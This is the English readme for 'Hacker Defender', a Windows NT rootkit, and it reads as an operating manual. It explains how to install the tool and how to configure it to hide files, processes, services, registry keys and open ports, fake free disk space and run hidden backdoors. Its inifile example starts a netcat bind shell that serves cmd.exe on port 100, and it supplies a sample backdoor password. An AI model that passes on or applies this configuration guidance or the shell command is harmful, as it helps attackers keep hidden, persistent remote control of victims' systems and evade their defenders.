readmeen.txt

Hacker Defender

======================[ Hacker defender - English readme ]======================

                                  NT Rootkit
                                  ----------

 Authors:        Holy_Father <holy_father@phreaker.net>
                 Ratter/29A <ratter@atlas.cz>
 Version:        1.0.0
 Birthday:       01.01.2004
 Home:           http://rootkit.host.sk, http://hxdef.czweb.org

 Betatesters:    ch0pper <THEMASKDEMON@flashmail.com>
                 aT4r <at4r@hotmail.com>
                 phj34r <phj34r@vmatrics.net>
                 unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>
                 rebrinak
                 GuYoMe
                 ierdna <ierdna@go.ro>
                 Afakasf <undefeatable@pobox.sk>

 Readme:         Czech & English by holy_father
                 French by GuYoMe



=====[ 1. Contents ]============================================================

 1. Contents
 2. Introduction
	2.1 Idea
	2.2 Licence
 3. Usage
 4. Inifile
 5. Backdoor
	5.1 Redirector
 6. Technical issues
	6.1 Version
	6.2 Hooked API
	6.3 Known bugs
 7. Faq
 8. Files



=====[ 2. Introduction ]========================================================

	Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 
and Windows XP, it may also work on latest NT based systems. Main code is 
written in Delphi 6. New functions are written in assembler. Driver code is 
written in C. Backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.


=====[ 2.1 Idea ]===============================================================

	The main idea of this program is to rewrite few memory segments in all
running processes. Rewriting of some basic modules cause changes in processes 
behaviour. Rewriting must not affect the stability of the system or running
processes.
	Program must be absolutely hidden for all others. Now the user is able
to hide files, processes, system services, system drivers, registry keys and 
values, open ports, cheat with free disk space. Program also masks its changes 
in memory and hiddes handles of hidden processes. Program installs hidden 
backdoors, register as hidden system service and installs hidden system driver. 
The technology of backdoor allowed to do the implantation of redirector. 


=====[ 2.2 Licence ]============================================================

	This project in version 1.0.0 is open source.

	And of course authors are not responsible for what you're doing with 
Hacker defender.



=====[ 3. Usage ]===============================================================

	Usage of hxdef is quite simple:

	>hxdef100.exe [inifile]
or 
	>hxdef100.exe [switch] 


	Default name for inifile is EXENAME.ini where EXENAME is the name of 
executable of main program without extension. This is used if you run hxdef 
without specifying the inifile or if you run it with switch (so default 
inifile is hxdef100.ini).

	These switches are available:

	-:installonly	-	only install service, but not run
	-:refresh	-	use to update settings from inifile
	-:noservice	-	doesn't install services and run normally
	-:uninstall	-	removes hxdef from the memory and kills all 
				running backdoor connections
				stopping hxdef service does the same now

Example:
	>hxdef100.exe -:refresh

	Hxdef with its default inifile is ready to run without any change 
in inifile. But it's highly recommended to create your own settings. See 
4. Inifile section for more information about inifile.
	Switches -:refresh and -:uninstall can be called only from original 
exefile. This mean you have to know the name and path of running hxdef 
exefile to change settings or to uninstall it.



=====[ 4. Inifile ]=============================================================

	Inifile must contain nine parts: [Hidden Table], [Root Processes], 
[Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], 
[Free Space], [Hidden Ports] and [Settings]. 
	In [Hidden Table], [Root Processes], [Hidden Services] a [Hidden 
RegValues] can be used character * as the wildcard in place of strings end. 
Asterisk can be used only on strings end, everything after first asterisks is 
ignored. All spaces before first and after last another string characters are
ignored.

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes which name start with "hxdef".


	Hidden Table is a list of files, directories and processes which should 
be hidden. All files and directories in this list will disappear from file 
managers. Programs in this list will be hidden in tasklist. Make sure main 
file, inifile, your backdoor file and driver file are mentioned in this list.

	Root Processes is a list of programs which will be immune against 
infection. You can see hidden files, directories and programs only with these 
root programs. So, root processes are for rootkit admins. To be mentioned in 
Root Processes doesn't mean you're hidden. It is possible to have root process
which is not hidden and vice versa.

	Hidden Services is a list of service and driver names which will be 
hidden in the database of installed services and drivers. Service name for the 
main rootkit program is HackerDefender100 as default, driver name for the main 
rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

	Hidden RegKeys is a list of registry keys which will be hidden. Rootkit
has four keys in registry: HackerDefender100, LEGACY_HACKERDEFENDER100, 
HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 as default. If you rename 
service name or driver name you should also change this list. 
	First two registry keys for service and driver are the same as its 
name. Next two are LEGACY_NAME. For example if you change your service name to 
BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

	Hidden RegValues is a list of registry values which will be hidden.

	Startup Run is a list of programs which	rootkit run after its startup.
These programs will have same rights as rootkit. Program name is divided from 
its arguments with question tag. Do not use " characters. Programs will 
terminate after user logon. Use common and well known methods for starting 
programs after user logon. You can use following shortcuts here:
	%cmd%		- stands for system shell exacutable + path
			  (e.g. C:\winnt\system32\cmd.exe)
	%cmddir%	- stands for system shell executable directory
			  (e.g. C:\winnt\system32\)
	%sysdir%	- stands for system directory
			  (e.g. C:\winnt\system32\)
	%windir%	- stands for Windows directory
			  (e.g. C:\winnt\)
	%tmpdir%	- stands for temporary directory
			  (e.g. C:\winnt\temp\)

Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100

2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

this will put a time stamp to temporary_directory\starttime.txt 
(e.g. C:\winnt\temp\starttime.txt) everytime rootkit starts
(%TIME% works only with Windows 2000 and higher)


	Free Space is a list of harddrives and a number of bytes you want to 
add to a free space. The list item format is X:NUM where X stands for the 
drive letter and NUM is the number of bytes that will be added to its number of 
free bytes. 

Example:
[Free Space]
C:123456789

this will add about 123 MB more to shown free disk space of disk C


	Hidden Ports is a list of open ports that you want to hide from 
applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 
lines. First line format is TCP:tppport1,tcpport2,tcpport3 ..., second line 
format is UDP:udpport1,udpport2,udpport3 ... 

Example:
1)
[Hidden Ports]
TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP

2)
[Hidden Ports]
TCP:8001
UDP:12345

this will hide two ports: 8001/TCP and 12345/UDP

3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800

this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP


	Settings contains eigth values: Password, BackdoorShell, 
FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription, 
DriverName and DriverFileName.
	Password which is 16 character string used when working with backdoor 
or redirector. Password can be shorter, rest is filled with spaces. 
	BackdoorShell is name for file copy of the system shell which is 
created by backdoor in temporary directory. 
	FileMappingName is the name of shared memory where the settings for 
hooked processes are stored.
	ServiceName is the name of rootkit service. 
	ServiceDisplayName is display name for rootkit service.
	ServiceDescription is description for rootkit service.
	DriverName is the name for hxdef driver.
	DriverFileName is the name for hxdef driver file.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef